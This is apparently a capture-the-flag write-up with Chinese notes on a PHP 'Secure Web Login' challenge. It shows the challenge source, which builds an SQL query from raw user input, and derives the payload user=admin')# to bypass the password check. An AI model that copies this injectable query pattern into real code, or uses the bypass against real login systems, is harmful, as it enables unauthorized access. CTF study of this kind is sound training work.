<html><head>
Secure Web Login
</head><body><?php
if($_POST[user]&&$_POST[pass]){mysql_connect(SAE_MYSQL_HOST_M.':'.SAE_MYSQL_PORT,SAE_MYSQL_USER,SAE_MYSQL_PASS);mysql_select_db(SAE_MYSQL_DB);$user=trim($_POST[user]);$pass=md5(trim($_POST[pass]));$sql="select user from ctf where (user='".$user."') and (pw='".$pass."')";echo'</br>'.$sql;$query=mysql_fetch_array(mysql_query($sql));if($query[user]=="admin"){echo"<p>Logged in! flag:******************** </p>";}if($query[user]!="admin"){echo("<p>You are not admin!</p>");}}echo$query[user];?><form method=post action=index.php><input type=text name=user value="Username"><input type=password name=pass value="Password"><input type=submit></form></body><a href="index.phps">Source</a></html>
$sql="select user from ctf where (user='"admin"') and (pw='21232f297a57a5a743894a0e4a801fc3')";echo'</br>'.$sql;//$sql=select user from ctf where (user='"admin"') and (pw='21232f297a57a5a743894a0e4a801fc3')
$query = mysql_fetch_array(mysql_query($sql));
//mysql_query執行$sql語句,但是返回You are not admin!
//這里考慮的情況可能是,賬戶密碼不正確,mysql_query($sql)返回false,所以mysql_fetch_array()括號內的內容是false,并不是一個數值,所以無法形成數組,當然$query變量里也就沒有user與admin了。
//雖然我們不知道它密碼,但我們看它要我們[user]==admin,于是猜想極有可能用戶名user是存在的,因此,最后嘗試$sql=select user from ctf where (user='admin'),直接在數據庫中查詢用戶名admin,sql語句返回的結果肯定會有類似user=admin,最后在mysql_fetch_array函數下生成數組,于是我們構造payload,如何構造請看第5點
if($query[user]=="admin"){echo"<p>Logged in! flag:******************** </p>";if($query[user]!="admin"){echo("<p>You are not admin!</p>");}
5.構造payload
if($_POST[user] && $_POST[pass])
$sql="select user from ctf where (user='".$user."') and (pw='".$pass."')"; //$user帶進去后,這里的雙引號就會消失的
構造語句:user=admin')#&pass=Password
